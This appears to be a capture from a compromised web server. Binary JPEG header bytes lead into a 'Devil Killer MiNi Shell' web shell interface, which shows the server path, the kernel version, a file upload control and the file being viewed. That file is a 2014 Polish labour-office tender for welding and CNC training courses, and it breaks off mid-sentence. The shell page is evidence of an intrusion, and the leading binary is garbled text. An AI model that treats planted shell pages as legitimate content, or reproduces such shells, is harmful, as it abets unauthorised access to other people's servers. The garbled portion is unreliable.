JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141120/381220-N-2014.html

<p class="kh_header"><b>Świdnica: Zorganizowanie i przeprowadzenie szkoleń grupowych finansowanych ze środków Funduszu Pracy dla 30 osób zarejestrowanych w Powiatowym Urzędzie Pracy w Świdnicy jako bezrobotne. (FP2)</b><br>
<b>Numer ogłoszenia: 381220 - 2014; data zamieszczenia: 20.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. M. Skłodowskiej-Curie 5, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8561818, faks 074 8561813.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.praca.swidnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń grupowych finansowanych ze środków Funduszu Pracy dla 30 osób zarejestrowanych w Powiatowym Urzędzie Pracy w Świdnicy jako bezrobotne. (FP2).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szkoleniami, realizowanymi w formie kursu, zostanie objętych łącznie 30 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Świdnicy.
Zamówienie podzielono na 2 części.
CZĘŚĆ 1
Spawanie blach i rur spoinami pachwinowymi metodą MAG (135) oraz blach spoinami czołowymi metodą MAG (135) i spawanie blach i rur spoinami pachwinowymi metodą TIG (141) - 20 osób
Szkolenie musi rozpocząć się w dniu 10.12.2014 r. i zakończyć około 20.02.2015 r.
UWAGA: Zamawiający dopuszcza możliwość skrócenia lub przedłużenia terminu zakończenia szkolenia do 14 dni kalendarzowych, przy zachowaniu wytycznych ujętych w opisie niniejszej części przedmiotu zamówienia, z uwzględnieniem pkt 9-14 INFORMACJI UZUPEŁNIAJĄCYCH.
Zajęcia teoretyczne oraz praktyczne muszą być przeprowadzone na terenie Świdnicy lub Wrocławia, bądź Wałbrzycha.
Plan nauczania powinien zawierać m.in. następujące tematy zajęć edukacyjnych:
1) SPAWANIE BLACH I RUR SPOINAMI PACHWINOWYMI METODĄ MAG (135)
(25 godz. zegarowych zajęć teoretycznych oraz 120 godz. zegarowych zajęć praktycznych)
2) SPAWANIE BLACH SPOINAMI CZOŁOWYMI METODĄ MAG (135) 
(12 godz. zegarowych zajęć teoretycznych oraz 100 godz. zegarowych zajęć praktycznych)
3) SPAWANIE BLACH I RUR SPOINAMI PACHWINOWYMI METODĄ TIG (141)
(23 godz. zegarowych zajęć teoretycznych oraz 80 godz. zegarowych zajęć praktycznych)
4) UMIEJĘTNOŚĆ POSZUKIWANIA I POZYSKIWANIA ZATRUDNIENIA.
Zagadnienia dotyczące spawania, jak również kwestie przeprowadzenia egzaminu państwowego/zewnętrznego muszą być zgodne z wytycznymi Instytutu Spawalnictwa w Gliwicach. 
Dodatkowo, dla ponadpodstawowego zakresu spawania Zamawiający wymaga przeprowadzenia egzaminu UDT lub egzaminu realizowanego przez niezależną międzynarodową jednostkę PersCert TÜV
Ilość godzin szkolenia przeznaczona na realizację powyższych zagadnień:
Na jednego uczestnika szkolenia przypada 365 godzin zegarowych, w tym:
- zajęć teoretycznych: 65 godz. zegarowych, z czego 5 godzin zegarowych przypada na umiejętność poszukiwania zatrudnienia,
- zajęć praktycznych: 300 godz. zegarowych.
Kurs przeznaczony jest dla osób:
- zarejestrowanych w tut. Urzędzie,
- które mają ukończone 18 lat,
- posiadających status bezrobotnego,
- z preferowanym wykształceniem minimum zawodowym mechanicznym,
- bez przeciwwskazań zdrowotnych do wykonywania danego zawodu (stosowne zaświadczenie lekarskie).
Wykonawca wyda uczestnikom szkolenia m.in. następujące dokumenty:
- w terminie do 3 dni roboczych licząc od daty zakończenia szkolenia:
a) zaświadczenie lub inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji zawierający, o ile odrębne przepisy nie stanowią inaczej: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia (a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość), nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.
Jeżeli Wykonawca posiada stosowny wpis do Ewidencji Placówek Niepublicznych w myśl przepisów o systemie oświaty dopuszcza się wystawienie odpowiedniego zaświadczenia regulowanego Rozporządzeniem Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012 poz. 186 z późn. zm.) pod warunkiem załączenia dodatkowego suplementu zawierającego wszelkie brakujące elementy, które Zamawiający określił wyżej, jako wymóg konieczny dla zaświadczeń.
- w terminach ustalonych w odrębnych przepisach (po zdanych przez uczestników szkolenia egzaminach państwowych/zewnętrznych) wystawione przez Instytucje do tego uprawnione następujące dokumenty:
b) świadectwo kwalifikacyjne spawacza (dla każdej metody spawania),
c) książeczkę spawacza,
d) uprawnienie UDT lub certyfikat TÜV (po zdanym egzaminie ponadpodstawowej metody spawania)
Dane słuchaczy oraz numery ewidencyjne posiadanych uprawnień muszą zostać zarejestrowane na podstawie protokołu egzaminacyjnego w Instytucie Spawalnictwa w Gliwicach.
Po zakończonym szkoleniu absolwent kursu powinien m.in.:
- posiadać umiejętności spawania prostych konstrukcji,
- wykonywać spoiny,
- uruchomić i obsługiwać urządzenia spawalnicze,
- dobrać odpowiednie parametry spawania,
- diagnozować i reagować na wszelkie zaburzenia powstałe przy wykonywaniu pracy,
- odczytywać rysunki konstrukcji spawanych,
- stosować odpowiednie środki ochrony indywidualnej oraz obsługiwać podręczny sprzęt przeciwpożarowy.
Wymagania dotyczące wyposażenia w sprzęt i materiały: 
min. 20 stanowisk spawalniczych, niezbędne materiały spawalnicze, inne, w zależności od metod dobranych przez prowadzącego.
W cenę szkolenia należy wliczyć stosowne ubranie ochronne wraz z odpowiednim obuwiem oraz ewentualnymi ochraniaczami (np. wzroku/słuchu/rąk, itp.) wymaganymi na danym stanowisku pracy. Po zakończeniu kursu przedmiotowa odzież oraz obuwie, użytkowane podczas kursu przez uczestników szkolenia, przechodzi na własność osób szkolonych.
Zajęcia dydaktyczne muszą być realizowane od poniedziałku do piątku (z wyłączeniem sobót i niedziel oraz dni świątecznych), przy czym:
a) zajęcia teoretyczne muszą rozpocząć się nie wcześniej niż o godz. 8:00 oraz zakończyć się nie później niż o godz. 18:00, 
b) zajęcia praktyczne przypadające na jednego uczestnika szkolenia muszą rozpocząć się nie wcześniej niż o godz. 8:00 oraz zakończyć się nie później niż o godz. 18:00,
c) dzienny wymiar zajęć musi wynosić nie mniej niż 5 oraz nie więcej niż 8 godzin zegarowych.
Szkolenie musi trwać przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu, przy czym liczba godzin szkolenia w miesiącu kalendarzowym (bez czasu niezbędnego do przeprowadzenia egzaminu końcowego) przypadająca na jednego uczestnika szkolenia musi wynosić:
- ok. 104 godzin zegarowych w I miesiącu kalendarzowym szkolenia,
- ok. 150 godzin zegarowych w II miesiącu kalendarzowym szkolenia,
- ok. 111 godzin zegarowych w III miesiącu kalendarzowym szkolenia,
z możliwością zastosowania pkt 13 INFORMACJI UZUPEŁNIAJĄCYCH.
CZĘŚĆ 2
Programowanie i obsługa obrabiarek sterowanych numerycznie CNC z blokiem rysunku technicznego - 10 osób
Szkolenie musi rozpocząć się w dniu 10.12.2014 r. i zakończyć w dniu 23.01.2015 r.
UWAGA: Zamawiający dopuszcza możliwość skrócenia lub przedłużenia terminu zakończenia szkolenia do 14 dni kalendarzowych, przy zachowaniu wytycznych ujętych w opisie niniejszej części przedmiotu zamówienia, z uwzględnieniem pkt 9-14 INFORMACJI UZUPEŁNIAJĄCYCH.
Zajęcia teoretyczne oraz praktyczne muszą być przeprowadzone na terenie Świdnicy.
Plan nauczania powinien zawierać m.in. następujące tematy zajęć edukacyjnych:
1) Przepisy BHP i ergonomia pracy w zakresie obszaru zawodowego.
2) Pomiar kształtu i wymiarów przedmiotu obrabianego.
3) Kompletowanie, analiza i czytanie rysunku technicznego.
4) Obróbka skrawaniem i narzędzia skrawające w zakresie obrabiarek CNC.
5) Budowa obrabiarek CNC. Sterowanie i obsługa obrabiarek CNC. Przygotowanie obrabiarki CNC do pracy.
6) Przygotowanie programu do uruchomienia. 
7) Uruchomienie i przebieg programu obróbki.
8) Szkolenie praktyczne na maszynach produkcyjnych.
9) Praktyczna nauka obsługi tokarki oraz frezarki CNC.
10) Umiejętność poszukiwania i pozyskiwania zatrudnienia.
Szkolenie winno zostać zrealizowane w formie zajęć teoretycznych i praktycznych, przy czym zajęcia teoretyczne obejmujące zagadnienia wskazane w pozycjach 2-7 muszą zostać przeprowadzone również w postaci ćwiczeń.
Ilość godzin szkolenia przeznaczona na realizację powyższych zagadnień:
Na jednego uczestnika szkolenia przypada 180 godzin zegarowych, w tym:
a) zajęć teoretycznych oraz ćwiczeń: 60 godz. zegarowych, z czego 5 godz. zegarowych przypada na umiejętność poszukiwania zatrudnienia,
b) zajęć praktycznych: 120 godz. zegarowych.
Kurs przeznaczony jest dla osób:
- zarejestrowanych w tut. Urzędzie,
- które mają ukończone 18 lat,
- posiadających status bezrobotnego,
- z preferowanym wykształceniem minimum zawodowym mechanicznym ze znajomością czytania rysunku technicznego,
- bez przeciwwskazań zdrowotnych do wykonywania danego zawodu (stosowne zaświadczenie lekarskie).
Wykonawca wyda uczestnikom szkolenia m.in. następujące dokumenty:
a) zaświadczenie lub inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji zawierający, o ile odrębne przepisy nie stanowią inaczej: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia (a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość), nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.
Jeżeli Wykonawca posiada stosowny wpis do Ewidencji Placówek Niepublicznych w myśl przepisów o systemie oświaty dopuszcza się wystawienie odpowiedniego zaświadczenia regulowanego Rozporządzeniem Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012 poz. 186 z późn. zm.) pod warunkiem załączenia dodatkowego suplementu zawierającego wszelkie brakujące elementy, które Zamawiający określił wyżej, jako wymóg konieczny dla zaświadczeń.
- w terminie do 3 dni roboczych licząc od daty zakończenia szkolenia.
Po zakończonym szkoleniu absolwent kursu powinien m.in.:
- obsługiwać tokarkę i frezarkę sterowaną numerycznie, 
- dobierać narzędzia i optymalne warunki skrawania, 
- rozróżniać funkcje parametrów skrawania narzędzi i funkcje pomocnicze, 
- rozróżniać i stosować kompensację promienia narzędzia przy toczeniu, 
- stosować cykle obróbkowe do toczenia, 
- symulować program w warunkach odpowiadających pracy rzeczywistej tokarki oraz frezarki, 
- interpretować komunikaty o ewentualnych błędach i wprowadzać ewentualne korekty, 
- wybierać i kompletować narzędzia do wykonania zadanego przedmiotu, 
- ustawiać i mocować narzędzia skrawające, 
- wprowadzać program sterujący do obrabiarki,
- sprawdzać poprawność działania zespołów obrabiarki CNC, 
- posługiwać się narzędziami i przyrządami pomiarowymi, 
- przestrzegać przepisy BHP podczas pracy na obrabiarkach. 
Wymagania dotyczące wyposażenia w sprzęt i materiały: 
stanowiska tokarek i frezarek CNC wraz z obrabiarkami CNC, narzędzia pomiarowe - suwmiarki, mikrometry, średnicówki czujnikowe, płytki wzorcowe, kątomierze, mikroskop warsztatowy, czujniki zegarowe itp., stanowiska komputerowe wyposażone w odpowiednie oprogramowanie użytkowe do realizacji przedmiotowego szkolenia, inne, w zależności od metod dobranych przez prowadzącego.
W cenę szkolenia należy wliczyć stosowne ubranie ochronne wraz z odpowiednim obuwiem oraz ewentualnymi ochraniaczami (np. wzroku/słuchu/rąk, itp.) wymaganymi na danym stanowisku pracy (które po zakończeniu kursu przejdzie na własność uczestnika szkolenia).
Zajęcia dydaktyczne muszą być realizowane od poniedziałku do piątku (z wyłączeniem sobót i niedziel oraz dni świątecznych), przy czym:
a) zajęcia teoretyczne muszą rozpocząć się nie wcześniej niż o godz. 8:00 oraz zakończyć się nie później niż o godz. 18:00, 
b) zajęcia praktyczne przypadające na jednego uczestnika szkolenia muszą rozpocząć się nie wcześniej niż o godz. 8:00 oraz zakończyć się nie później niż o godz. 18:00,
c) dzienny wymiar zajęć musi wynosić nie mniej niż 5 oraz nie więcej niż 8 godzin zegarowych.
Szkolenie musi trwać przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu, przy czym liczba godzin szkolenia w miesiącu kalendarzowym (bez czasu niezbędnego do przeprowadzenia egzaminu końcowego) przypadająca na jednego uczestnika szkolenia musi wynosić:
- ok. 90 godzin zegarowych w I miesiącu kalendarzowym szkolenia,
- ok. 90 godzin zegarowych w II miesiącu kalendarzowym szkolenia,
z możliwością zastosowania pkt 13 INFORMACJI UZUPEŁNIAJĄCYCH..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 10.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zaktualizowany na bieżący rok kalendarzowy wpis do rejestru instytucji szkoleniowych prowadzony przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej wydany na podstawie art. 20 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy. Zamawiający dokona sprawdzenia spełnienia powyższego warunku poprzez weryfikację danych w elektronicznym Rejestrze Instytucji Szkoleniowych, dostępnym na stronach internetowych wojewódzkich urzędów pracy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zorganizowali w okresie ostatnich 3 lat co najmniej 2 szkolenia grupowe ( za szkolenie grupowe uważa się szkolenie w którym uczestniczy co najmniej 8 osób). Zamawiający dokona sprawdzenia spełniania powyższego warunku poprzez weryfikację zapisu części I Załącznika do formularza oferta - rubryka Doświadczenie Wykonawcy w zakresie organizacji szkoleń grupowych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca wykaże, iż dysponuje pomieszczeniami wykładowymi, których liczba i pojemność jest adekwatna do liczby części, których dotyczy złożona oferta oraz uwzględnia wielkość grupy szkoleniowej danej części zamówienia, jak również harmonogram zajęć. Wykonawca w opisie warunków szkolenia musi dokładnie podać miejsce realizacji zajęć teoretycznych oraz praktycznych i w sposób szczegółowy opisać wyposażenie sal, w których prowadzone będą zajęcia dydaktyczne. Aby umożliwić uczestnikom szkolenia właściwe przygotowanie praktyczne Wykonawca musi zapewnić odpowiednią ilość sprzętów oraz materiałów niezbędnych do przeprowadzenia zajęć. Dlatego też należy napisać jaki sprzęt i materiały będą wykorzystywane podczas zajęć oraz w jakich ilościach. W celu potwierdzenia spełnienia powyższego warunku należy wypełnić  rubrykę Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych części III załącznika do formularza oferta.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zajęcia teoretyczne, jak i praktyczne powinni prowadzić wykładowcy posiadający uprawnienia do wykonywania zawodu instruktora/wykładowcy. Osoby prowadzące zajęcia muszą posiadać odpowiednią wiedzę oraz przygotowanie merytoryczne do prowadzenia zajęć powierzonych im przez Wykonawcę. Wykładowcy winni dysponować stosownymi dokumentami (np. certyfikaty, świadectwa, zaświadczenia, dyplomy, itp.), które potwierdzą kwalifikacje i uprawnienia kadry szkoleniowej.  Kserokopii niniejszych dokumentów nie należy dołączyć do oferty szkoleniowej, lecz uwzględnić je opisując należycie w załączniku do formularza oferta w poz. II pod nazwą KWALIFIKACJE KADRY DYDAKTYCZNEJ. Nie jest jednak wymagane, by kadra szkoleniowa, była wpisana do bazy ekspertów na podstawie ustawy o zasadach prowadzenia polityki rozwoju (Dz.U. z  2006, nr 227, poz. 1658 ze zm.). Każdy wykładowca musi mieć doświadczenie praktyczne w zakresie prowadzonych zajęć tj. przeprowadził co najmniej 2 szkolenia grupowe odpowiadające tematyce przedmiotu zamówienia w ciągu ostatnich 3 lat. Zakres lub nazwy przeprowadzonych szkoleń oraz ich termin  należy wskazać w załączniku do formularza oferta w poz. II pod nazwą KWALIFIKACJE KADRY DYDAKTYCZNEJ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 55</li>
<li>2 - certyfikat jakości usług lub inny dokument - 10</li>
<li>3 - kwalifikacje kadry dydaktycznej - 10</li>
<li>4 - doświadczenie kadry dydaktycznej - 25</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty w przypadku:
